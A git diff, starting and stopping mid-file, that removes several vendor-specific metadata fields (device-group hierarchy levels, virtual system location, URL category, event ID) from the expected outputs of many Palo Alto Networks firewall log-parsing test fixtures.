+++ b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json	
@@ -39,10 +39,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "VirtualLocation": "vsys1",
-      "VirtualSystemID": "1"
-    },
     "related": {
       "hosts": [
         "PA-VM"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
index d14918dab..a6c93b2c4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json	
@@ -58,14 +58,8 @@
       "serial_number": "000011111112222"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "982",
-      "DGHierarchyLevel2": "117",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "url"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index e8c257c69..6fd2dbfa0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
@@ -63,15 +63,8 @@
       "serial_number": "no-serial"
     },
     "paloalto": {
-      "ContentType": "text/plain",
-      "DGHierarchyLevel1": "463",
-      "DGHierarchyLevel2": "525",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "url"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
index 717e963a0..ff9edc877 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json	
@@ -57,10 +57,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "PanOSSourceLocation": "US",
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "hosts": [
         "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
index 3e52f494c..ab8aae097 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
@@ -30,11 +30,6 @@
       "serial_number": "11111114444"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "auth-success",
       "Threat_ContentType": "auth"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
index eb10d6148..49c1758ab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json	
@@ -49,8 +49,7 @@
       "serial_number": "1801016000"
     },
     "paloalto": {
-      "Threat_ContentType": "start",
-      "VirtualLocation": "vsys1234"
+      "Threat_ContentType": "start"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
index 3af5d5428..c4c2b4c70 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json	
@@ -37,10 +37,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url-filtering"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
index 5e1cc96a9..17ae8dd31 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json	
@@ -37,10 +37,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dhcp"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
index f4541dcbf..72af37535 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dnsproxy"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
index 3142ed671..ee2f64323 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
@@ -60,14 +60,8 @@
       "serial_number": "no-serial"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "463",
-      "DGHierarchyLevel2": "467",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
-      "Threat_ContentType": "file",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "file"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
index f08a677ef..aa4388311 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
@@ -37,9 +37,7 @@
       "serial_number": "PF000000"
     },
     "paloalto": {
-      "EventID": "gateway-switch-to-ssl",
       "Threat_ContentType": "0",
-      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "tunnel"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
index bbf2d4e97..ed54db08a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json	
@@ -33,10 +33,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index f569f8246..6ba2ed95f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
@@ -51,16 +51,10 @@
       "serial_number": "012001002253"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "24",
-      "DGHierarchyLevel2": "315",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
-      "VirtualLocation": "vsys1",
       "threat": {
         "id": "40005",
-        "name": "LDAP: User Login Brute Force Attempt",
-        "type": "vulnerability exploit detection"
+        "name": "LDAP: User Login Brute Force Attempt"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
index 610ab7c24..f5f961342 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json	
@@ -73,14 +73,8 @@
       "serial_number": "007954000XXXXXX"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "999",
-      "DGHierarchyLevel2": "1111",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
-      "Threat_ContentType": "file",
-      "URLCategory": "business-and-economy",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "file"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
index 25db7ff0a..501fb4be5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
@@ -38,12 +38,7 @@
       "version": "0.0.-1"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "556",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "globalprotect",
-      "VirtualSystemID": "1",
       "connection": {
         "stage": "logout"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
index c3d742b70..80edd7cf5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json	
@@ -62,13 +62,8 @@
       "serial_number": "007954000370000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "997",
-      "DGHierarchyLevel2": "1169",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
       "Threat_ContentType": "vulnerability",
-      "VirtualLocation": "vsys1",
       "threat": {
         "category": "brute-force",
         "id": "SSH User Authentication Brute Force Attempt(40015)"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
index b4a75c57c..6a5a4358f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json	
@@ -64,14 +64,8 @@
       "serial_number": "00795400037XXXX"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "997",
-      "DGHierarchyLevel2": "1169",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "url"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
index a470b3176..1ad423127 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json	
@@ -32,10 +32,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "ntpd"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
index af31efa35..ed9754708 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json	
@@ -36,10 +36,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "port"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
index c9ebd467e..76aeaa4ce 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json	
@@ -36,10 +36,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "fb"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
index 2d21571e0..c773195d0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json	
@@ -30,11 +30,6 @@
       "serial_number": "016201000000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "test-event",
       "Threat_ContentType": "vpn"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
index 8a299b691..70c358caf 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json	
@@ -34,10 +34,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
index 4b7dc612f..b481b6c39 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url-filtering"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
index 7901b05ce..989c8393e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json	
@@ -37,10 +37,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dhcp"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
index 30a9a9970..a92e1d91b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json	
@@ -33,10 +33,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
index f74ff5a47..c546509c6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
index 8c122fc65..452b9d6bb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
index 524aef010..4b2a51b0f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
index f305c2d3e..36807c11d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
index 63f3bd258..a83bce94f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
index a00e82987..548954584 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json	
@@ -32,10 +32,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
index 9cb10263a..cd41f06d0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json	
@@ -33,10 +33,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
index 2aa5ce29e..2130588d1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index 51579bdcb..db55cc61a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
@@ -47,15 +47,9 @@
       "serial_number": "016201000000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url",
-      "VirtualLocation": "vsys1",
       "threat": {
-        "id": "9999",
-        "type": "URL filtering log"
+        "id": "9999"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
index eadb40265..196fc9c0c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
@@ -57,16 +57,10 @@
       "serial_number": "012345678910"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "320",
-      "DGHierarchyLevel2": "90",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
-      "VirtualLocation": "vsys1",
       "threat": {
         "id": "95187",
-        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability",
-        "type": "custom threat"
+        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
index d2e4e4775..bc3ccb698 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json	
@@ -30,11 +30,6 @@
       "serial_number": "026701002348"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "general",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
index c0f834538..cc477a27e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json	
@@ -59,13 +59,7 @@
       "serial_number": "007954000351998"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "Threat_ContentType": "end",
-      "URLCategory": "any",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
index cfa92faf3..72bc384fb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json	
@@ -59,13 +59,7 @@
       "serial_number": "007954000351998"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "Threat_ContentType": "end",
-      "URLCategory": "any",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
index 2f58900ab..4657c725b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
index 9a1d42f34..b22a31f88 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
index ea53d3353..9f659a601 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "auth"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
index dee27d0e1..d2477e4f1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json	
@@ -30,14 +30,7 @@
       "serial_number": "01545100000000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "0",
-      "Threat_ContentType": "login",
-      "VirtualLocation": "vsys1",
-      "VirtualSystemID": "1"
+      "Threat_ContentType": "login"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
index 23d0aaaf8..a3738eaf2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json	
@@ -32,10 +32,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
index c3b8bcffc..42b530f45 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json	
@@ -37,10 +37,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "fb"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
index 57cb1121b..4e097a01e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
@@ -59,16 +59,9 @@
       "serial_number": "016401004874"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
